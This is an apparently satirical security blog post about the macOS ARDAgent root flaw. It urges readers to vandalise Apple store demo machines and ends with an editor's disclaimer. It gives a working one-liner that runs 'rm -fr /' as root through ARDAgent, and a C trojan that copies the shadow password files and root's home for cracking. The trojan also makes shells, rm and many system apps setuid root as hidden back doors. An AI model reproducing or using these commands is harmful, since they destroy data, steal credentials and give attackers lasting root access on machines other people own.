Rixstep
 About | ACP | Buy | Industry Watch | Learning Curve | News | Products | Search | Substack
Home » Learning Curve » Red Hat Diaries

Rooting Apple Can Be So Much Fun

And oh so much fun it is!


Get It

Try It

Alpha's little test at the Apple store was innocuous. As is the 'SLIPOC' ('system login items proof of concept'). But what if they weren't?

What if there was a simple way for anyone to walk into any Apple store anywhere at any time and wreak total havoc?

It should be easy to try.

Have Apple - as is suspected - contacted all their store managers and told them how to chmod ARDAgent to apply the patch?

There's one way to find out: walk into your nearest Apple store or Apple reseller and try the following on all the machines you can get at.

On every last one until they kick you out. Then hit the next store.

osascript -e 'tell application "ARDAgent" to do shell script "rm -fr /"'

SLIPOC could also be enhanced to make sure you always have a back door in. The easiest way would be to add a few lines of code to SLIHack.

int main(int argc, const char *argv[]) {

    // We still keep this first part as we can post the shadow files
    // to ourselves so we can crack the system passwords and do a remote login.

    system("/sbin/mount -uw /");
    system("/bin/mkdir /Users/Shared/.SLIHack");
    system("cp -R /private/var/db/shadow /Users/Shared/.SLIHack");
    system("cp -R /private/var/root /Users/Shared/.SLIHack");
    system("chown -R 501:501 /Users/Shared/.SLIHack");
    system("chmod -R 0777 /Users/Shared/.SLIHack");

    // Now we add a few lines to make sure we always have a back door.

    // 1. First we make all the Unix shells 04555/SUID root.
    // Anytime we launch Terminal we can use any of them to get root.

    // And we add rm to the list so all rm commands are root enabled -
    // this can be fun even if we never come back - the slightest error
    // on the user's part and the system is toast!

    system("chmod 04555 /bin/bash /bin/csh /bin/rm /bin/sh /bin/tcsh /bin/zsh");

    // 2. Now we make a few more back doors with common Apple Cocoa apps.
    // They'll all work just like that stupid ARDAgent.

    system("chmod 04555 /Applications/iCal.app/Contents/MacOS/iCal");
    system("chmod 04555 /Applications/iChat.app/Contents/MacOS/iChat");
    system("chmod 04555 /Applications/iTunes.app/Contents/MacOS/iTunes");
    system("chmod 04555 /Applications/Mail.app/Contents/MacOS/Mail");
    system("chmod 04555 /Applications/Preview.app/Contents/MacOS/Preview");
    system("chmod 04555 /Applications/Safari.app/Contents/MacOS/Safari");
    system("chmod 04555 /Applications/System\ Preferences.app/Contents/MacOS/System\ Preferences");
    system("chmod 04555 /Applications/TextEdit.app/Contents/MacOS/TextEdit");

    // 3. Now we make a few more with Apple's 'core services'.

    system("chmod 04555 /System/Library/CoreServices/Finder.app/Contents/MacOS/Finder");
    system("chmod 04555 /System/Library/CoreServices/Dock.app/Contents/MacOS/Dock");
    system("chmod 04555 /System/Library/CoreServices/Front\ Row.app/Contents/MacOS/Front\ Row");
    system("chmod 04555 /System/Library/CoreServices/Help Viewer.app/Contents/MacOS/Help Viewer");
    system("chmod 04555 /System/Library/CoreServices/Kerberos.app/Contents/MacOS/Kerberos");

    // And so on - you can do this on just about any Cocoa app bundle in the system!

    // Now the trojan disappears as the user logs in, totally unaware anything has happened.

    return NSApplicationMain(argc, argv);
}

It's either that or wait until Apple fix the flaws. Which considering they've known about them for five years already may be never. Or until some corporation losing data through hackers gets wind of this and launches a class action suit against them for negligence.

[Naturally no one is seriously advocating people go into their local Apple stores, full of frustations over Steve's innumerable bait and switch tricks, snarky refund policies, and 'whole banana arrogance', distract the clerks and vandalise the computers on display. And people are already doing this anyway. Ed.]

See Also
Learning Curve: A Suggestion
Industry Watch: You're Root, Dude!
Industry Watch: You're Toast, Dude?
Learning Curve: The First Real Malware?
Industry Watch: ARDAgent - Here to Stay?
Learning Curve: Apple Redefine 'Epic FAIL'?
Hotspots: SLIPOC – Root Exploit of Mac OS X
Learning Curve: ARDAgent on Snow Leopard
Industry Watch: It's Not New It Starts with 10.2
The Technological: Walking into an Apple Store
Apple Developer Connection: AppleScript Overview
Industry Watch: Huge, Crazy, Ridiculous OS X Security Hole
Apple Developer Connection: Apple Events Programming Guide

Hackers Handbook
Developers Workshop: Hackers Handbook I
Developers Workshop: Hackers Handbook II
Developers Workshop: Hackers Handbook III
Developers Workshop: Hackers Handbook IV

About | ACP | Buy | Industry Watch | Learning Curve | News | Products | Search | Substack
Copyright © Rixstep. All rights reserved.